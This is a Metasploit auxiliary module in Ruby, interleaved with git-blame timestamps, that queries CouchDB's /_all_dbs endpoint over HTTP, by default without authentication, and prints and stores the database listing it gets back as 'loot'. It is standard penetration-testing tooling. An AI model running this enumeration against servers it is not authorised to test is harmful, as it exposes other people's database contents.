2013-05-13 21:42:33 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-05-13 21:42:33 +00:00
|
|
|
##
|
|
|
|
|
2013-05-11 02:18:48 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Report
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'CouchDB Enum Utility',
|
|
|
|
'Description' => %q{
|
|
|
|
Send a "send_request_cgi()" to enumerate databases and your values on CouchDB (Without authentication by default)
|
|
|
|
},
|
|
|
|
'Author' => [ 'espreto <robertoespreto[at]gmail.com>' ],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
))
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(5984),
|
|
|
|
OptString.new('TARGETURI', [true, 'Path to list all the databases', '/_all_dbs']),
|
|
|
|
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method, default GET', 'GET', ['GET', 'POST', 'PUT', 'DELETE'] ]),
|
|
|
|
OptString.new('USERNAME', [false, 'The username to login as']),
|
|
|
|
OptString.new('PASSWORD', [false, 'The password to login with'])
|
|
|
|
], self.class)
|
|
|
|
end
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
username = datastore['USERNAME']
|
|
|
|
password = datastore['PASSWORD']
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
uri = normalize_uri(target_uri.path)
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri,
|
|
|
|
'method' => datastore['HTTP_METHOD'],
|
|
|
|
'authorization' => basic_auth(username, password),
|
|
|
|
'headers' => {
|
|
|
|
'Cookie' => 'Whatever?'
|
|
|
|
}
|
|
|
|
})
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if res.nil?
|
|
|
|
print_error("No response for #{target_host}")
|
|
|
|
return nil
|
|
|
|
end
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
temp = JSON.parse(res.body)
|
|
|
|
rescue JSON::ParserError
|
|
|
|
print_error("Unable to parse JSON")
|
|
|
|
return
|
|
|
|
end
|
2013-05-13 21:42:33 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
results = JSON.pretty_generate(temp)
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if (res.code == 200)
|
|
|
|
print_good("#{target_host}:#{rport} -> #{res.code}")
|
|
|
|
print_good("Response Headers:\n\n #{res.headers}")
|
|
|
|
print_good("Response Body:\n\n #{results}\n")
|
|
|
|
elsif (res.code == 403) # Forbidden
|
|
|
|
print_error("Received #{res.code} - Forbidden to #{target_host}:#{rport}")
|
|
|
|
print_error("Response from server:\n\n #{results}\n")
|
|
|
|
elsif (res.code == 404) # Not Found
|
|
|
|
print_error("Received #{res.code} - Not Found to #{target_host}:#{rport}")
|
|
|
|
print_error("Response from server:\n\n #{results}\n")
|
|
|
|
else
|
|
|
|
print_status("Received #{res.code}")
|
|
|
|
print_line("#{results}")
|
|
|
|
end
|
2013-05-11 02:18:48 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
|
|
|
|
path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results")
|
|
|
|
print_status("Results saved to #{path}")
|
|
|
|
else
|
|
|
|
print_error("Failed to save the result")
|
|
|
|
end
|
|
|
|
end
|
2013-05-11 02:18:48 +00:00
|
|
|
end
|